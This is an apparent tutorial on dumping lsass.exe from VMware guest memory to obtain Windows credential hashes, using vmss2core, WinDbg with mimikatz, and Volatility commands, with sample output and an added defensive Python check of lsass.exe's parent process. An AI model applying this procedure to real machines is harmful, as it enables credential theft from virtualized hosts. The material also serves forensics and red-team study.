VMware/vSphere Dump lsass.exe

Obtain the hashes held in the guest system by acquiring the virtual machine's memory pages and dumping lsass.exe from them.

Preparation

Prepare the Windows SDK; the Windows SDK contains WinDbg.exe.

Obtaining the dump file with vmss2core

https://kb.vmware.com/s/article/2003941?lang=zh_CN

  1. https://flings.vmware.com/vmss2core

    Visual C++ Redistributable Packages for Visual Studio 2013

    Dependency: https://www.microsoft.com/zh-CN/download/details.aspx?id=40784

    x64 x86

  2. Take a snapshot of the virtual machine, or suspend it

  3. Run the vmss2core command. It works the same way on Linux, macOS, Windows and vSphere; the conversion can be done directly on the remote server or after downloading the files to a local machine

    vmss2core.exe -W8 vmwarewin11.vmss vmwarewin11.vmem                (suspended state)
    vmss2core.exe -W8 vmwarewin11-snap.vmsn vmwarewin11-snap.vmem      (snapshot state)
    H:\VMs\Windows 11 x64>c:\Users\admin\Downloads\Programs\vmss2core-sb-8456865.exe -W8 "H:\VMs\Windows 11 x64\Windows 11 x64-39ba6684.vmss" "H:\VMs\Windows 11 x64\Windows 11 x64-39ba6684.vmem"
    vmss2core version 8456865 Copyright (C) 1998-2017 VMware, Inc. All rights reserved.
    region[0]: start=0 end=c0000000.
    region[1]: start=100000000 end=240000000.
    scanning pa=0 len=0x10000000
    scanning pa=0xfffffab len=0x10000000
    scanning pa=0x1fffff56 len=0x10000000
    scanning pa=0x2fffff01 len=0x10000000
    scanning pa=0x3ffffeac len=0x10000000
    scanning pa=0x4ffffe57 len=0x10000000
    scanning pa=0x5ffffe02 len=0x10000000
    scanning pa=0x6ffffdad len=0x10000000
    
  4. The dump file memory.dmp is produced

WinDbg

Take WinDbg.exe from the Windows SDK and load the dmp file.

Wait for loading to finish.

# reload
0: kd> .symfix
0: kd> .reload
# load the module
0: kd> .load E:\mimikatz\x64\mimilib.dll

  .#####.   mimikatz 2.2.0 (x64) built on Aug 10 2021 02:01:09
 .## ^ ##.  "A La Vie, A L'Amour" - Windows build 22000
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                  WinDBG extension ! * * */

===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================

# find the process
0: kd> !process 0 0 lsass.exe
Unable to get program counter
PROCESS ffff8001d9b6f080
    SessionId: 0  Cid: 02e0    Peb: 56074ba000  ParentCid: 0248
    DirBase: a604b000  ObjectTable: ffff9807a25e1840  HandleCount: 1258.
    Image: lsass.exe

# switch to the process context
0: kd> .process ffff8001d9b6f080

# mimikatz
0: kd> !mimikatz

Appendix: converting a vmem file with tools

When Windows blue-screens, it writes a system error report in the form of a memory dump with the .dmp extension, saved as C:\Windows\MEMORY.DMP.

moonsols_windows_memory_toolkit

The files come from the internet; check them for backdoors yourself or run them in a dedicated offline virtual machine. I take no responsibility for any consequences.

moonsols_windows_memory_toolkit_community_edition.zip

  1. Suspend the virtual machine and obtain the .vmem file
  2. Convert it
  3. https://raw.githubusercontent.com/arizvisa/windows-binary-tools/master/bin2dmp.exe

Dumping a specified process and gathering basic information with the Volatility framework (testing)

https://www.volatilityfoundation.org/releases

https://github.com/volatilityfoundation/volatility/wiki

http://downloads.volatilityfoundation.org/releases/2.6/volatility_2.6_lin64_standalone.zip

Python is needed to install the dependencies.

C:\Python27\python.exe -m pip install crypto pycryptodome distorm3
volatility.exe -f win11.vmem imageinfo #show memory image information
volatility -f mem.vmem --profile=WinXPSP2x86 printkey -K "SAM\Domains\Account\Users\Names" #list user accounts

volatility -f mem.vmem --profile=WinXPSP2x86 printkey -K "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
volatility -f mem.vmem --profile=WinXPSP2x86 procdump -p [PID] -D [directory to save the dumped file]

Windows 2008 R2

./volatility_2.6_lin64_standalone -f "/home/kali/Desktop/mem/Win 2008R2 Web01-7ea4920a.vmem" imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/kali/Desktop/mem/Win 2008R2 Web01-7ea4920a.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80001a4c0a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80001a4dd00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2021-09-26 13:12:44 UTC+0000
     Image local date and time : 2021-09-26 21:12:44 +0800

./volatility_2.6_lin64_standalone -f "/home/kali/Desktop/mem/Win 2008R2 Web01-7ea4920a.vmem" --profile=Win2008R2SP1x64

https://github.com/volatilityfoundation/volatility3

Install dependencies

C:\Python39\python.exe -m pip install crypto pycryptodome yara-python pefile capstone

View basic information

PS C:\Users\admin\Desktop\python\volatility3> c:\Python39\python.exe vol.py -f "C:\Users\admin\Desktop\Win 2008R2 Web01-7ea4920a.vmem" windows.info
Volatility 3 Framework 1.2.1
Progress:  100.00               PDB scanning finished
Variable        Value

Kernel Base     0xf8000185b000
DTB     0x187000
Symbols file:///C:/Users/admin/Desktop/python/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/3844DBB920174967BE7AA4A2C20430FA-2.json.xz
Is64Bit True
IsPAE   False
layer_name      0 WindowsIntel32e
memory_layer    1 FileLayer
KdDebuggerDataBlock     0xf80001a4c0a0
NTBuildLab      7601.17514.amd64fre.win7sp1_rtm.
CSDVersion      1
KdVersionBlock  0xf80001a4c068
Major/Minor     15.7601
MachineType     34404
KeNumberProcessors      4
SystemTime      2021-09-26 13:12:44
NtSystemRoot    C:\Windows
NtProductType   NtProductServer
NtMajorVersion  6
NtMinorVersion  1
PE MajorOperatingSystemVersion  6
PE MinorOperatingSystemVersion  1
PE Machine      34404
PE TimeDateStamp        Sat Nov 20 09:30:02 2010

List processes

PS C:\Users\admin\Desktop\python\volatility3> C:\Python39\python.exe .\vol.py -f "C:\Users\admin\Desktop\Win 2008R2 Web01-7ea4920a.vmem" windows.psscan.PsScan
Volatility 3 Framework 1.2.1
Progress:  100.00               PDB scanning finished
PID     PPID    ImageFileName   Offset  Threads Handles SessionId       Wow64   CreateTime      ExitTime        File output

3228    3196    vcredist_x86.e  0xfd8058a0      1       -       -       True    2021-09-26 13:12:40.000000      N/A     Disabled
3408    508     msiexec.exe     0xfd86b060      7       -       -       False   2021-09-26 13:12:43.000000      N/A     Disabled
3460    1716    cmd.exe 0xfd8919e0      0       -       -       False   2021-09-26 13:12:44.000000      2021-09-26 13:12:44.000000      Disabled
3480    3460    ipconfig.exe    0xfd896b30      0       -       -       False   2021-09-26 13:12:44.000000      2021-09-26 13:12:44.000000      Disabled
2712    508     msdtc.exe       0xfda12950      15      -       -       False   2021-09-26 13:12:27.000000      N/A     Disabled
2884    508     taskhost.exe    0xfda648e0      9       -       -       False   2021-09-26 13:12:29.000000      N/A     Disabled
2468    508     VSSVC.exe       0xfdabc800      6       -       -       False   2021-09-26 13:12:30.000000      N/A     Disabled
3332    3252    VC_redist.x86.  0xfdb1ab30      8       -       -       True    2021-09-26 13:12:42.000000      N/A     Disabled
2260    2088    vmtoolsd.exe    0xfdb47060      9       -       -       False   2021-09-26 13:12:34.000000      N/A     Disabled
2160    2088    vm3dservice.ex  0xfdb55060      2       -       -       False   2021-09-26 13:12:34.000000      N/A     Disabled
2848    2248    setup.exe       0xfdb94b30      1       -       -       True    2021-09-26 13:12:36.000000      N/A     Disabled
3196    2848    setup64.exe     0xfdbb1b30      1       -       -       False   2021-09-26 13:12:39.000000      N/A     Disabled
3252    3228    vcredist_x86.e  0xfdbb7b30      8       -       -       True    2021-09-26 13:12:40.000000      N/A     Disabled
1968    508     SQLAGENT.EXE    0xfdc12790      16      -       -       False   2021-09-26 13:12:22.000000      N/A     Disabled
1232    348     conhost.exe     0xfdc3ab30      2       -       -       False   2021-09-26 13:12:23.000000      N/A     Disabled
2096    508     fdlauncher.exe  0xfdcb5780      4       -       -       False   2021-09-26 13:12:25.000000      N/A     Disabled
2148    508     svchost.exe     0xfdcf9060      13      -       -       False   2021-09-26 13:12:25.000000      N/A     Disabled
2196    508     svchost.exe     0xfdd03890      6       -       -       False   2021-09-26 13:12:25.000000      N/A     Disabled
2320    628     rundll32.exe    0xfdd13060      6       -       -       False   2021-09-26 13:12:32.000000      N/A     Disabled
2612    628     rundll32.exe    0xfdd1cb30      6       -       -       False   2021-09-26 13:12:32.000000      N/A     Disabled
2656    628     WmiPrvSE.exe    0xfdd29670      9       -       -       False   2021-09-26 13:12:26.000000      N/A     Disabled
2088    2988    explorer.exe    0xfdd4e060      26      -       -       False   2021-09-26 13:12:30.000000      N/A     Disabled
2988    456     userinit.exe    0xfdd599e0      3       -       -       False   2021-09-26 13:12:29.000000      N/A     Disabled
2516    2096    fdhost.exe      0xfdd67060      8       -       -       False   2021-09-26 13:12:26.000000      N/A     Disabled
3004    944     dwm.exe 0xfdd9b520      3       -       -       False   2021-09-26 13:12:29.000000      N/A     Disabled
2544    508     dllhost.exe     0xfdda7560      18      -       -       False   2021-09-26 13:12:26.000000      N/A     Disabled
1088    508     spoolsv.exe     0xfde2fb30      15      -       -       False   2021-09-26 13:11:41.000000      N/A     Disabled
1156    508     MsDtsSrvr.exe   0xfde5d9d0      12      -       -       False   2021-09-26 13:11:41.000000      N/A     Disabled
1308    508     sqlservr.exe    0xfde8e480      49      -       -       False   2021-09-26 13:12:12.000000      N/A     Disabled
2412    508     dllhost.exe     0xfdea7630      24      -       -       False   2021-09-26 13:12:26.000000      N/A     Disabled
1428    508     mysqld.exe      0xfdecc060      23      -       -       False   2021-09-26 13:12:13.000000      N/A     Disabled
2248    1716    VMwareToolsUpg  0xfdedda20      2       -       -       True    2021-09-26 13:12:31.000000      N/A     Disabled
1464    508     svchost.exe     0xfdef5b30      4       -       -       False   2021-09-26 13:12:14.000000      N/A     Disabled
1488    508     sqlwriter.exe   0xfdf017c0      7       -       -       False   2021-09-26 13:12:14.000000      N/A     Disabled
1556    508     tomcat7.exe     0xfdf2d770      32      -       -       False   2021-09-26 13:12:14.000000      N/A     Disabled
1564    348     conhost.exe     0xfdf35b30      3       -       -       False   2021-09-26 13:12:15.000000      N/A     Disabled
1620    508     VGAuthService.  0xfdf4a8e0      4       -       -       False   2021-09-26 13:12:15.000000      N/A     Disabled
1716    508     vmtoolsd.exe    0xfdf7a060      10      -       -       False   2021-09-26 13:12:17.000000      N/A     Disabled
508     408     services.exe    0xfe00c7d0      27      -       -       False   2021-09-26 13:11:36.000000      N/A     Disabled
516     408     lsass.exe       0xfe02a910      15      -       -       False   2021-09-26 13:11:37.000000      N/A     Disabled
524     408     lsm.exe 0xfe02c850      13      -       -       False   2021-09-26 13:11:37.000000      N/A     Disabled
340     508     svchost.exe     0xfe050b30      16      -       -       False   2021-09-26 13:11:40.000000      N/A     Disabled
628     508     svchost.exe     0xfe069060      20      -       -       False   2021-09-26 13:11:37.000000      N/A     Disabled
800     508     svchost.exe     0xfe0ea060      19      -       -       False   2021-09-26 13:11:38.000000      N/A     Disabled
844     508     svchost.exe     0xfe0fc060      52      -       -       False   2021-09-26 13:11:38.000000      N/A     Disabled
900     508     svchost.exe     0xfe11b890      19      -       -       False   2021-09-26 13:11:39.000000      N/A     Disabled
944     508     svchost.exe     0xfe1295f0      11      -       -       False   2021-09-26 13:11:39.000000      N/A     Disabled
984     508     svchost.exe     0xfe14a5f0      28      -       -       False   2021-09-26 13:11:39.000000      N/A     Disabled
2524    348     conhost.exe     0xfe36d630      1       -       -       False   2021-09-26 13:12:26.000000      N/A     Disabled
400     392     csrss.exe       0xfe3c1b30      13      -       -       False   2021-09-26 13:11:36.000000      N/A     Disabled
408     340     wininit.exe     0xfe3c3b30      8       -       -       False   2021-09-26 13:11:36.000000      N/A     Disabled
456     392     winlogon.exe    0xfe3e8b30      5       -       -       False   2021-09-26 13:11:36.000000      N/A     Disabled
348     340     csrss.exe       0xfe5ecb30      9       -       -       False   2021-09-26 13:11:35.000000      N/A     Disabled
696     508     svchost.exe     0xff134060      12      -       -       False   2021-09-26 13:11:38.000000      N/A     Disabled
252     4       smss.exe        0xff419b30      3       -       N/A     False   2021-09-26 13:11:32.000000      N/A     Disabled
1336    508     msmdsrv.exe     0xffd4c060      25      -       -       False   2021-09-26 13:12:13.000000      N/A     Disabled
4       0       System  0xffeae040      93      -       N/A     False   2021-09-26 13:11:32.000000      N/A     Disable
C:\Python39\python.exe .\vol.py -f "C:\Users\admin\Desktop\Win 2008R2 Web01-7ea4920a.vmem" windows.pslist.PsList --pid 516 --dump
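A triage check over the psscan table above, written as an added example (it is not part of the original post and not Volatility code): it parses the table, locates lsass.exe, and verifies that exactly one live instance exists and that its parent is wininit.exe, the expected parent on this OS. A second lsass.exe, or one whose parent is not wininit.exe, is a common sign of credential-theft tooling masquerading as LSASS. The sample input is a constructed subset of the table on this page.

```python
"""Triage check over Volatility 3 windows.psscan output (added example)."""
from typing import Dict, List, NamedTuple, Optional


class Proc(NamedTuple):
    pid: int
    ppid: int
    name: str
    offset: int
    exit_time: Optional[str]   # None when the ExitTime column is "N/A"


# Constructed sample: a subset of the psscan rows shown on this page.
SAMPLE_PSSCAN = """\
PID     PPID    ImageFileName   Offset  Threads Handles SessionId       Wow64   CreateTime      ExitTime        File output

3460    1716    cmd.exe 0xfd8919e0      0       -       -       False   2021-09-26 13:12:44.000000      2021-09-26 13:12:44.000000      Disabled
508     408     services.exe    0xfe00c7d0      27      -       -       False   2021-09-26 13:11:36.000000      N/A     Disabled
516     408     lsass.exe       0xfe02a910      15      -       -       False   2021-09-26 13:11:37.000000      N/A     Disabled
408     340     wininit.exe     0xfe3c3b30      8       -       -       False   2021-09-26 13:11:36.000000      N/A     Disabled
4       0       System  0xffeae040      93      -       N/A     False   2021-09-26 13:11:32.000000      N/A     Disabled
"""


def parse_psscan(text: str) -> List[Proc]:
    """Parse the whitespace-separated psscan table, skipping header and blank lines."""
    procs: List[Proc] = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 11 or not f[0].isdigit():
            continue
        # Tokens: PID PPID Name Offset Threads Handles SessionId Wow64 CreateDate CreateTime ExitTime...
        # CreateTime is two tokens (date, time); ExitTime is either "N/A" or two tokens.
        exit_time = None if f[10] == "N/A" else f"{f[10]} {f[11]}"
        procs.append(Proc(int(f[0]), int(f[1]), f[2], int(f[3], 16), exit_time))
    return procs


def check_lsass(procs: List[Proc]) -> List[str]:
    """Return findings about lsass.exe; an empty list means it looks as expected."""
    by_pid: Dict[int, Proc] = {p.pid: p for p in procs}
    live = [p for p in procs if p.name.lower() == "lsass.exe" and p.exit_time is None]
    findings: List[str] = []
    if len(live) != 1:
        findings.append(f"expected exactly one live lsass.exe, found {len(live)}")
    for p in live:
        parent = by_pid.get(p.ppid)
        pname = parent.name.lower() if parent else "<unknown>"
        if pname != "wininit.exe":
            findings.append(f"lsass.exe pid {p.pid} has unexpected parent {pname} (pid {p.ppid})")
    return findings


if __name__ == "__main__":
    print(check_lsass(parse_psscan(SAMPLE_PSSCAN)) or "lsass.exe looks as expected")
```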

Later I will look at dumping memory from Hyper-V; using Hyper-V together with storage pools as a cluster is very common abroad.

References:

https://jamescoote.co.uk/Dumping-LSASS-with-SharpShere/